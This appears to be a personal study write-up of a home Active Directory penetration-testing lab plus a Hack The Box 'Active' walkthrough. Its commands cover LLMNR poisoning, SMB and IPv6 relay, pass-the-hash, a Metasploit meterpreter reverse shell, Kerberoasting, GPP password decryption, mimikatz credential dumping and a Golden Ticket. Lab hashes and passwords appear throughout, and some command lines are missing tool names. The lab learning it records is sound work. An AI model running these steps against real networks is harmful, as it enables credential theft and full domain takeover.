Published on

AD Lab


AD Lab

Account Overview

Domain Controller

DC: RANK1-DC (MARVEL-DC equivalent)

DC Password: P@$$w0rd!

Root Domain Name: RANK.local (MARVEL.local equivalent)


Domain Admin:

copy Administrator from domain controller policies

Name: King Rank

User logon name: krank

Password: Password2019!@#

More Users:

Name: Noob Loser

User logon name: nloser

Password: Password2

Fake SQL account:

Copied from King Rank

name: SQL Service

logon: SQLService

password: MYpassword123#

windows vm 2

Name: Rank Two (Frank Castle equivalent)

Password: Password1

Computer PC name: RANK2 (FRANKCASTLE)

Security questions: Bob

User logon name (configured in DC Active Directory Users and Computers): rtwo (fcastle)

Note, the User logon name is needed for me to be able to login from anywhere in the AD as user → user. So for example making rtwo an admin on both rtwo and rthree I can login from either windows vm as long as the server is running.


windows vm 3

Name: Rank Three (Spider Man)

Password: Password!

Computer PC name: RANK3 (PETERPARKER)

User logon name (configured in DC Active Directory Users and Computers): rthree (spiderman)

Security questions: Jim



added a share


After setting up the Server:


We are now logging into the domain RANK as Administrator

Setting up attacks

Set up kerberoasting attack

  • setspn -a RANK1-DC/SQLService.RANK.local:60111 RANK\SQLService


  • >setspn -T RANK.local -Q */*
    • Queries it


Adding rtwo to Administrator from vm2



Adding rthree Administrators

Default as logged in as rank\administrator:


Making rthree an admin on this machine and rtwo an admin on here as well, so we have 2 local admins on 1 machine.


Now what our Computers look like in our OU


LLMNR Poisoning


IP =

  1. sudo responder -I eth0 -wdv

Windows vm2 rtwo

  1. File Explorer
  2. Enter kali's IP into the Quick Access bar


We get a popup, and if we look back at kali we have hashes!


  1. Copy one of them, nano rtwo.hash

  2. Cracked it with hashcat rtwo.hash /usr/share/wordlists/rockyou.txt


There’s the password for our user rtwo!

SMB Relay

Instead of cracking hashes gathered with Responder, we can instead relay those hashes to specific machines and potentially gain access.


  • SMB signing must be disabled on the target
  • Relayed user credentials must be admin on machine

  1. Check what machines have SMB signing on or off, here it will be enabled but not required, which is what we want.

    1. nmap --script=smb2-security-mode.nse -p 445 -Pn


  2. nano smbtargets.txt

    1. Add in all the machines that are in the network so the NTLM hash passes through targets which have admin enabled on them, in our example rtwo is an admin on his machine as well as rthree, so it will bounce from rtwo to rthree and return rthree's hashes.


  3. Run Responder with SMB = Off and HTTP = Off because we want to see responses from servers that do not have SMB signing On.

    1. nano /usr/share/responder/Responder.conf


  4. sudo responder -I eth0 -wdv


  5. Time to setup the ntlmrelay listener as well.

    1. Ctrl + Shift + T

    2. -tf smbtargets.txt -smb2support


  6. Go to windows machine, and point it straight to the attacker machine which is our Kali IP

    1. Ctrl + E

    2. \\


  7. Then we get prompted for credentials but we do not even need to enter credentials. Since both windows machines are running, they bounce off of each other in the network and relay the hash to my terminal 😀



Rank Three:1001:aad3b435b51404eeaad3b435b51404ee:fbdcd5041c96ddbd82224270b57f11fc:::

Doing an interactive NTLM Relay attack

Same thing as above, except we add a -i

  1. -tf smbtargets.txt -smb2support -i

  2. Trigger the event same as above


  3. Now we can see a local shell has opened on

  4. nc 11000


And we get an SMB shell!




  2. use C$ or use ADMIN$ - we have full control on the machine now 😀

  3. ls


Other commands with

  1. -tf smbtargets.txt -smb2support -e any.exe
    1. Can execute exe’s, so if we wanted to create a reverse shell with meterpreter and exploit it to get a reverse shell we could
  2. -tf smbtargets.txt -smb2support -c "whoami"
    1. Execute specific commands on the system

Mitigating SMB


For example if we didn’t have a local admin rtwo on rthree, likely we wouldn’t actually get a NTLM hash.

Gaining Shell Access

We can use to use a hash that we found, authenticate as a specific user, which has admin permissions.

  1. -hashes aad3b435b51404eeaad3b435b51404ee:fbdcd5041c96ddbd82224270b57f11fc rthree@ -target-ip -port 445
    1. The hash here is the hash of Rank Three



  1. rank.local/rthree:Password\!@
    1. This is another way to authenticate to the machine if we don’t have a hash, but we do have a password.


IPv6 Attacks

  1. sudo mitm6 -d rank.local
    1. Run mitm6 against the DC rank.local


Relay this

  1. -6 -t ldaps:// -wh fakewpad.rank.local -l lootme
    1. Now we set a relay attack against the DC IP, with a fake wordpad as our file and lootme as our loot directory.

Reboot a windows 10 machine

  1. Then you would get AUTHENTICATED in which would output a bunch of .json and .html information in the loot directory, which you can read with firefox <file>.html to get information on Usernames and Passwords



  2. firefox domain_users_by_group.html



On the windows machine we want to start up powershell and bypass the execution policy.

  1. Transfer PowerView.ps1 to your target Windows machine.
  2. powershell -ep bypass
  3. . .\PowerView.ps1
    1. The initial . here sources the operator in Powershell and executes a script in the current scope, rather than the policy’s scope.
    2. Nothing will happen in terminal if it runs correctly.
  4. Get-NetDomain
    1. This will just give a bunch of information on the local Domain.
  5. Get-NetDomainController
    1. This will show us the IP of the Domain Controller.
  6. Get-DomainPolicy
    1. This will show us all the policies in the domain, stuff like Kerberos access, etc.
  7. (Get-DomainPolicy)."system access"
    1. This will show us more indepth system access inofromation specifically.
  8. Get-NetUser
    1. This list shows us information on all the users, no plaintext passwords but it will give us a better idea of what user is on what machine, interesting descriptions which could contain passwords, etc.
    2. Get-NetUser | select cn
    3. Get-NetUser | select samaccountname
    4. Get-NetUser | select description
      1. Some easier ways to sort through users with cn, specific sam accounts with samaccountname, and specific description's.
  9. Get-UserProperty
    1. Then say we find pwdlastset
      1. Get-UserProperty -Properties pwdlastset
    2. Or a logoncount
      1. Get-UserProperty -Properties logoncount
    3. Or badpwdcount
      1. Get-UserProperty -Properties badpwdcount
  10. Get-NetComputer -FullData
    1. This gives us a lot of information on each machine on the network, could remove -FullData to get it a bit more simplified.
  11. Get-NetGroup -GroupName *admin
  12. Get-NetGroupMember -GroupName "Domain Admins"
    1. This will show us the Domain Admins within the network, this is probably the best one to run so it is easier to understand where we want to pivot to.
  13. Invoke-ShareFinder
    1. Find all the SMB shares within the network, all the files that are being shared, where they are being shared, etc.
    2. It’s good to look through these shares and try to find anything of a point of interest to grab more credentials.
  14. Get-NetGPO
    1. This will show us all the Group Policies.
  15. Get-NetGPO | select displayname, whenchanged
    1. Gives us an idea of when certain things within the network were changed, such as enabling or disabling windows defender.

Bloodhound Overview

  1. Launch bloodhound as I normally would



    1. Download on target machine
  2. powershell -ep bypass

  3. . .\SharpHound.ps1

  4. Invoke-BloodHound -CollectionMethod All -Domain RANK.local -ZipFileName

    1. Enumerates all the data we need to move this into BloodHound


  5. Copy the data from the Downloads folder, likely we would use ligolo-ng and move it to our Linux machine. Here I just moved it from my Windows machine to my host OS then host OS to Linux.


Open Bloodhound

  1. Clear the database


  2. Upload Data

  3. Import



Find all Domain Admins


Find Shortest Paths to Domain Admins


Shortest Paths from Kerberoastable Users

  1. Choose KRBTGT or the unique account shown, in my example its SQLSERVICE



Shortest Paths to High Value Targets

  1. This gets messy quickly, but we’re really just looking for an account that HasSession.


Post Exploitation

Pass the Hash / Pass the Password

Throw a password all around the subnet with crackmapexec to find where else it could be used.

  1. crackmapexec smb -u rtwo -d RANK.local -p Password1


  2. crackmapexec smb -u rtwo -d RANK.local -p Password1 --sam

    1. Try to dump the SAM hashes


  1. rank.local/rtwo:Password1@


Quick win here, can get an easy shell.

Another way to dump hashes -

  1. rank.local/rtwo:Password1@


  2. Could also do rank.local/rtwo:Password/!@ and we get the Rank Three hash as well.

We can compare these hashes, and realize that the Administrator hash is the same between both machines.


This means it is likely vulnerable to a Pass the Hash attack.

  • nano admin-ranktwo-rankthree.txt


Hashcat cracking SAM hashes - These are also called NTLM hashes, which is from dumping a SAM.

  1. hashcat admin-ranktwo-rankthree.txt /usr/share/wordlists/rockyou.txt
    1. Could also do hashcat admin-ranktwo-rankthree.txt -m 1000 /usr/share/wordlists/rockyou.txt because -m 1000 is specifying NTLM in hashcat.

Authenticating with a Hash

  1. crackmapexec -u rtwo -H 64f12cddaa88057e06a81b54e73b949b
    1. Could also do to be more specific, but .0/24 tries everything in the network.


Taking this hash to for a shell

  • asks for LMHASH:NTHASH whenever authenticating with a hash. In the hashes we have, the beginning portion is the LMHASH, and the end portion (after : is placed) is the NTHASH:


  1. rtwo:@ -hashes aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b


Token Impersonation

AKA Cookies for your computer.

Two Types:

  • Delegate: Created for logging in or using Remote Desktop
  • Impersonate: “Non-interactive” such as attaching a network drive or some sort of domain logon script


  1. msfconsole
  2. use exploit/windows/smb/psexec
  3. options
    1. set RHOSTS
    2. set LHOST eth0
    3. set SMBDomain rank.local
    4. set SMBPass Password1
    5. set SMBUser rtwo
    6. set payload windows/x64/meterpreter/reverse_tcp


  1. run


  1. Some commands we could run after immediately getting a meterpreter shell
    1. hashdump
    2. getuid
    3. sysinfo

Load a tool

  1. load -l


Load incognito

  1. load incognito


  2. help

    1. This will list out all of meterpreter's commands/help list, but at the bottom we will see how incognito works.


  1. list_tokens -u


  • It should show RANK\Administrator (which is the DC) but I am currently signed in with RANK\rtwo on my vm2, so it shows that. If I log out and then login with RANK\Administrator on vm2, I will see RANK\Administrator in this list.

  • Logged out, went to RANK\Administrator:P@$$w0rd!

  • Came back to Kali and did list_tokens -u:


  • This token exists until this computer is rebooted.

  1. impersonate_token NT\ AUTHORITY\\SYSTEM
    1. If we wanted to impersonate RANK\Administrator we would do:
      1. impersonate_token RANK\\Administrator

The extra \'s is to “escape” characters. Usually you have to do this for spaces, !, @, etc.

  1. shell

  2. whoami


  3. Yet again though, we could just hashdump to get the Administrator hash. There’s a lot of ways to go about this.



Goal of Kerberoasting: Get the TGS key and decrypt server’s account hash. Once you get user credentials, you can kerberoast.


  1. Request TGT, Provide HTLM Hash
  2. Receive TGT with krbtgt hash
  3. Request TGS for server (Presents the TGT)
  4. Receive TGS with server’s account hash

Kerberoasting in Action

Step 1: Get SPNS, Dump Hash

  1. <DOMAIN/username:password> -dc-ip <ip> -request
    1. Example: rank.local/rtwo:Password1 -dc-ip -request
  • Hash



    Fixed for Hashcat:

Step 2: Crack that hash

  1. hashcat -m 13100 kerberoast.txt /usr/share/wordlists/rockyou.txt

    1. Example: hashcat -m 13100 kerberoast.txt /usr/share/wordlists/rockyou.txt



GPP Attacks

Group Policy Preferences allowed admins to create policies using embedded credentials

Example from Active - HTB


enumerate smb

How many SMB shares can we find smbmap -H

└─$ smbmap -H                   
[+] IP:	Name: active.htb                                        
        Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	ADMIN$                                            	NO ACCESS	Remote Admin
	C$                                                	NO ACCESS	Default share
	IPC$                                              	NO ACCESS	Remote IPC
	NETLOGON                                          	NO ACCESS	Logon server share 
	Replication                                       	READ ONLY	
	SYSVOL                                            	NO ACCESS	Logon server share 
	Users                                             	NO ACCESS

Ok so 7 total shares

And “Replication” is read only so we can probably access it

smbclient to read READ ONLY shares

smbclient //active.htb/Replication hit enter til we get login since we are READ ONLY

Now that we are authenticated, we can look around for a file that can help us

Found this directory \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\ with a file Groups.xml in it get Groups.xml

Looking at the file locally we have:

└─$ cat Groups.xml 
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>

Username= active.htb\SVC_TGS

Encoded password cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"

We are looking at a GPP password here. A Group Policy Preference password.

We decrypt this with gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ



smbmap with credentials

  1. smbmap -u SVC_TGS -p GPPstillStandingStrong2k18 -H active.htb
└─$ smbmap -u SVC_TGS -p GPPstillStandingStrong2k18 -H active.htb                                               1[+] IP: active.htb:445	Name: unknown                                           
        Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	ADMIN$                                            	NO ACCESS	Remote Admin
	C$                                                	NO ACCESS	Default share
	IPC$                                              	NO ACCESS	Remote IPC
	NETLOGON                                          	READ ONLY	Logon server share 
	Replication                                       	READ ONLY	
	SYSVOL                                            	READ ONLY	Logon server share 
	Users                                             	READ ONLY

We have these credentials and now we can see that we can read 3 more shares so we can probably authenticate to them like we did earlier to Replication, but with the other shares:

  1. smbclient //active.htb/<share> -U SVC_TGS then it should prompt with password

And we get SVC_TGS user confirmed



We can Kerberoast here because we have a low privileged domain, with user credentials.

  1. First we need to use GetUserSPNs from impacket to get a list of service usernames which are associated with normal user accounts.
  2. /opt/impacket/examples/ -dc-ip active.htb/SVC_TGS -outputfile GetUserSPNs.out
    1. It is important we specify -outputfile GetUserSPNs.out because if there is a ticket, it will output it and we can crack it
└─$ /opt/impacket/examples/ -dc-ip active.htb/SVC_TGS -outputfile GetUserSPNs.out                                                                                                                           2Impacket v0.10.1.dev1+20230728.114623.fb147c3f - Copyright 2022 Fortra

ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation 
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 15:06:40.351723  2023-08-02 23:15:19.048952             

[-] CCache file is not found. Skipping...
└─$ ls                                                                    
cpassword.txt  full-enumerate.nmap  GetUserSPNs.out  GptTmpl.inf  Groups.xml  hash.txt  hydra.restore  identified-ports.nmap  users.txt  user.txt  vuln.nmap  windapsearch
└─$ cat GetUserSPNs.out 

Seems as we got a ticket for the Administrator

hashcat time

  1. hashcat GetUserSPNs.out --wordlist /usr/share/wordlists/rockyou.txt

= Ticketmaster1968

Authenticate as root

Now we can authenticate with smbclient

  1. smbclient //active.htb/Users -U Administrator



URL File Attack

Works in a scenario where you compromised a user, this user has any sort of file share access. We can utilize this access to capture hashes from Responder, crack the hashes, and try to pivot to another user from the cracked credentials.

Setting up a URL File

  • Logged into rtwo and created a InternetShortcut file on a share we created earlier called hackme


  • When we try to open the file it does this, which is good, we could also have it go to like Google or something:


Start responder on kali

  1. sudo responder -I eth0 -v


  2. Go back to the rtwo machine and click on the Network Share hackme


  3. Go back to kali




  1. Copy paste the entire hash into ntlmv2.txt


  2. We see it is a NTLMv2 hash so -m 5600

  3. hashcat -m 5600 ntlmv2.txt /usr/share/wordlists/rockyou.txt



Tool used to view and stel credentials, generate Kerberos tickeets, and leverage attacks. Dumps credentials stored in memory.

  1. For lab purposes, download mimikatz.exe from github and put it on the Domain Controller. Not going to show the steps here, just download it and drag and drop.
    1. Assume we have compromised a Domain Controller, and this is what you would do Post Exploitation.

Start Mimikatz

  1. cmdcd Desktop\mimikatz_trunk\Win32mimkatz.exe



  1. privilege::debug is the first thing you should always do. This looks for privileges allowed to mimikatz so we can exfiltrate data. If we don’t have this on, we can’t bypass the memory protections in Windows.



  1. sekurlsa::logonpasswords - Had to swap to the \mimikatz_trunk\x64 version for this to work - This dumps all of the log on passwords that shows us the computer name, their NTLM hash, any user that has logged in since the past reboot, which is all stored in the memory. This also opens up the possibilty for Pass The Hash attacks.



  1. lsadump::sam = no dump

  2. lsadump::sam /patch = no dump

  3. lsadump::lsa /patch = dumps


  • We could take these individual hashes to Kali and crack them. If we are able to crack these passwords, likely we want the one that will lead us to a pivot, like an Admin.

Golden Ticket Attacks

If we have the hash of an account, we can generate a Kerberos Ticket Granting Ticket (KTGT). This means if we have a Golden Ticket we have complete access to the entire machine, shells anywhere, files from anywhere, etc.

  1. mimikatz.exe like we did from above and privilege::debug

From the lsadump::lsa /patch we see krbtgt which is usually what you want to target when doing a Golden Ticket Attack, as followed:

lsadump::lsa /inject /name:

  1. lsadump::lsa /inject /name:krbtgt


Whenever going for a Golden Ticket Attack, you want the SID which is the first underlined value, and the NTLM hash which is the second underlined value. I just threw these into a notepad.




  1. kerberos::golden /User:Administrator /domain:rank.local /sid:S-1-5-21-214227636-635186922-3716746861 /krbtgt:7372d5f66f31e6de1d0f8f311b17f549 /id:500 /ptt

/User:<anything can be here> I just did admin, which can either be an existing or non-existing account, it does not matter /domain:<domain.local> self explanatory /sid:<sid> the SID we copied /<user>:<NTLM> here I have krbtgt which is our user and the NTLM hash /id:500 stands for your RID, the Admin account which is 500 by default. /ptt pass the ticket


  1. misc::cmd

Launch a cmd.exe with our new Golden Ticket Permissions

  1. dir \\RANK2\C$


Here we call the network shares \\ and RANK2 is the Computer PC Name. If I tried to do rtwo it wouldn’t work, because that is the User Logon Name.

Then we would likely transfer in psexec.exe locally to run it against a user like as followed:

  1. cd Downloadspsexec.exe \\RANK2 cmd.exe